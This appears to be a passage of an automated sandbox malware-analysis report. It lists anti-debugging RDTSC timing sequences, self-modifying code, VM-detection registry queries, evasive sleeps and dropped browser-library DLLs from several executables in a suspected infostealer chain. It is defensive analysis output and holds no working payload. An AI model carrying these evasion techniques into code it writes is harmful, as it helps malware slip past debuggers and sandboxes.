Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25F73 second address: A25FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007F70146AC614h 0x0000000b pop esi 0x0000000c js 00007F70146AC623h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70146AC60Dh 0x00000019 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25FC0 second address: A25FDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 ja 00007F7014CC2CB6h 0x0000000f jmp 00007F7014CC2CBDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25FDE second address: A25FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25FE7 second address: A25FEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A26172 second address: A2617E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2617E second address: A26182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A1E183 second address: A1E19B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F70146AC606h 0x00000009 pop ecx 0x0000000a js 00007F70146AC612h 0x00000010 jc 00007F70146AC606h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9FB841 second address: 9FB862 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7014CC2CC4h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A26325 second address: A2632E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2632E second address: A2634A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7014CC2CC5h 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A26D60 second address: A26D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A26D66 second address: A26D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A26D6A second address: A26D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2AE70 second address: A2AE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2AE77 second address: A2AE81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F70146AC606h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2B45B second address: A2B461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2A37F second address: A2A396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2A396 second address: A2A39C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2A39C second address: A2A3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2B687 second address: A2B69D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2C77A second address: A2C79B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F70146AC606h 0x0000000e jmp 00007F70146AC613h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2C79B second address: A2C7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2C7A5 second address: A2C7F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 jp 00007F70146AC606h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F70146AC617h 0x0000001f jno 00007F70146AC606h 0x00000025 pushad 0x00000026 popad 0x00000027 push edx 0x00000028 pop edx 0x00000029 popad 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9F671C second address: 9F6720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9F6720 second address: 9F6732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC60Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9F81EF second address: 9F81FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7014CC2CBEh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A34ACF second address: A34AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F70146AC606h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A34AD9 second address: A34B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F7014CC2CC1h 0x0000000f jmp 00007F7014CC2CBBh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7014CC2CC5h 0x0000001d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A34B19 second address: A34B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A34B21 second address: A34B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A34EE5 second address: A34EFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jmp 00007F70146AC60Bh 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A35E8B second address: A35E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A35E90 second address: A35EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70146AC619h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A362B8 second address: A362BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A362BF second address: A362E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F70146AC612h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A362E1 second address: A362E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A36A8F second address: A36A96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A36D4B second address: A36D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7014CC2CBCh 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A36FB1 second address: A36FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A39C65 second address: A39C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A39C69 second address: A39C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A3A6AB second address: A3A6B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A3C7BF second address: A3C7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70146AC617h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A3FEF1 second address: A3FEF6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A41EB6 second address: A41EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F70146AC608h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3026h], edi 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jp 00007F70146AC60Ch 0x00000035 jbe 00007F70146AC606h 0x0000003b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A42DDB second address: A42DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A44FE5 second address: A45004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F70146AC616h 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A45004 second address: A45008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A476F8 second address: A47702 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70146AC60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A47702 second address: A47711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A486D7 second address: A486DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A486DB second address: A4873D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 pushad 0x0000000a or dword ptr [ebp+12445B6Ch], edx 0x00000010 jmp 00007F7014CC2CC5h 0x00000015 popad 0x00000016 jns 00007F7014CC2CBBh 0x0000001c mov esi, 71C748B7h 0x00000021 popad 0x00000022 push 00000000h 0x00000024 mov edi, dword ptr [ebp+122D368Dh] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F7014CC2CB8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push edi 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A4873D second address: A48746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A48746 second address: A4875C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007F7014CC2CBAh 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A4C947 second address: A4C94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A4C94D second address: A4C9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D3544h], ecx 0x0000000d and ebx, dword ptr [ebp+122D2002h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F7014CC2CB8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D34B2h], edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007F7014CC2CB8h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D3551h], eax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push esi 0x0000005b jmp 00007F7014CC2CBAh 0x00000060 pop esi 0x00000061 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A4D902 second address: A4D906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A4D906 second address: A4D92A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F7014CC2CB6h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A4E9CF second address: A4EA52 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a jc 00007F70146AC61Ah 0x00000010 jmp 00007F70146AC614h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F70146AC608h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 pushad 0x00000032 mov dword ptr [ebp+122D296Ah], ebx 0x00000038 popad 0x00000039 or dword ptr [ebp+122D238Ah], ebx 0x0000003f push 00000000h 0x00000041 jmp 00007F70146AC611h 0x00000046 xchg eax, esi 0x00000047 jmp 00007F70146AC614h 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A4EA52 second address: A4EA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A51A58 second address: A51A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F70146AC615h 0x00000008 jmp 00007F70146AC60Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E5F75A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FF3834 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FF1FE1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FFDF1B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E5F72B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1082E68 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Special instruction interceptor: First address: 88EA5D instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Special instruction interceptor: First address: A2B3CF instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Special instruction interceptor: First address: A29D79 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Special instruction interceptor: First address: A299F3 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Special instruction interceptor: First address: ABFC18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A5EA5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BFB3CF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BF9D79 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BF99F3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C8FC18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Special instruction interceptor: First address: 12048DD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Special instruction interceptor: First address: 13D7BAF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Special instruction interceptor: First address: C1CBAF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Special instruction interceptor: First address: DBE570 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Special instruction interceptor: First address: DE27E3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Special instruction interceptor: First address: C1CAA8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Special instruction interceptor: First address: E41459 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Special instruction interceptor: First address: 105F75A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Special instruction interceptor: First address: 11F3834 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Special instruction interceptor: First address: 11F1FE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Special instruction interceptor: First address: 11FDF1B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Special instruction interceptor: First address: 105F72B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Special instruction interceptor: First address: 1282E68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Special instruction interceptor: First address: 70DC60 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Special instruction interceptor: First address: 94FF31 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Special instruction interceptor: First address: 712A3E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Special instruction interceptor: First address: 66FDC60 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Special instruction interceptor: First address: 693FF31 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Special instruction interceptor: First address: 6702A3E instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Memory allocated: 4BC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Memory allocated: 4E20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Memory allocated: 4BC0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Code function: 9_2_051F0733 rdtsc 9_2_051F0733
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7588 Thread sleep time: -40020s >= -30000s Jump to behavior
